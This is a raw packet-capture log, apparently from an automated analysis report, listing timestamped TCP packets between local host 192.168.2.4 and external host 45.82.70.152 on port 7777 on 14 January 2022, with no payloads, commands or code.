                                                                                                                                  Jan 14, 2022 14:10:41.887526035 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887543917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887556076 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.887559891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887578011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887594938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887609959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887615919 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.887626886 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887641907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887658119 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887667894 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.887672901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887690067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887706041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887722015 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.887747049 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.887798071 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901134014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901153088 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901169062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901185036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901201010 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901220083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901236057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901235104 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901252985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901269913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901304960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901324034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901324987 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901345968 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901346922 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901365042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901386976 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901391029 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901407957 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901427031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901428938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901452065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901467085 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901472092 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901494980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901510954 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901515961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901537895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901556015 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901559114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901582003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901601076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901604891 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901623011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901637077 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901643991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901665926 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901681900 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901688099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901709080 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901729107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901737928 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901751041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901770115 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901771069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901792049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901812077 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901812077 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901833057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901860952 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901870966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901892900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901911974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901915073 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901932955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901951075 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901954889 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901974916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.901993990 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.901995897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902017117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902035952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902036905 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902056932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902071953 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902077913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902097940 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902116060 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902118921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902139902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902157068 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902159929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902180910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902200937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902200937 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902221918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902240038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902242899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902264118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902282000 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.902285099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.902323961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912167072 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912199020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912225962 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912245989 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912254095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912282944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912292004 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912311077 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912338972 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912350893 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912364960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912393093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912405968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912419081 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912446022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912453890 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912473917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912501097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912509918 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912528992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912555933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912581921 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912584066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912622929 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912625074 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912657976 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912683964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912694931 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912712097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912738085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912749052 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912765026 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912791014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912801027 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912817001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912842989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912856102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912870884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912899017 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912908077 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912926912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912951946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.912964106 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.912978888 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913007021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913017035 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913033009 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913059950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913069010 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913088083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913115025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913125038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913141966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913167000 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913177967 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913193941 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913219929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913228989 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913254023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913284063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913291931 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913311005 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913338900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913347006 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913367033 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913393974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913404942 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913420916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913446903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913456917 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913474083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913500071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913511038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913526058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913552999 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913566113 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913580894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913605928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913619041 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913631916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913657904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913670063 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913683891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913710117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913721085 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913736105 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913762093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913774967 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913790941 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913816929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913829088 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913844109 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913899899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913906097 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913927078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913954020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.913973093 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.913980961 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914006948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914021015 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914046049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914074898 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914089918 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914100885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914128065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914138079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914155006 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914181948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914195061 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914208889 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914235115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914246082 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914261103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914288044 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914300919 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914313078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914339066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914350986 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914365053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914390087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914402962 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914417028 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914443016 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914453983 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914469957 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914496899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914506912 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914535046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914561987 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914573908 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914588928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914613962 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914627075 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914647102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914674044 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914684057 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914700031 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914726019 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914738894 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.914758921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914788008 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.914800882 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927479982 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927521944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927547932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927547932 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927572966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927592039 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927602053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927625895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927644968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927651882 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927678108 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927697897 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927701950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927727938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927743912 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927752972 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927778959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927794933 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927805901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927829027 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927853107 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927853107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927879095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927897930 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927902937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927927971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927952051 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.927953005 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927978992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.927999973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928003073 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928026915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928047895 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928050995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928076029 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928095102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928098917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928123951 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928141117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928147078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928172112 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928188086 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928198099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928220034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928241968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928242922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928267002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928286076 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928289890 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928313971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928330898 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928338051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928363085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928380013 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928386927 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928410053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928430080 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928433895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928457975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928481102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928489923 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928503990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928528070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928530931 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.928553104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.928567886 CET497787777192.168.2.445.82.70.152
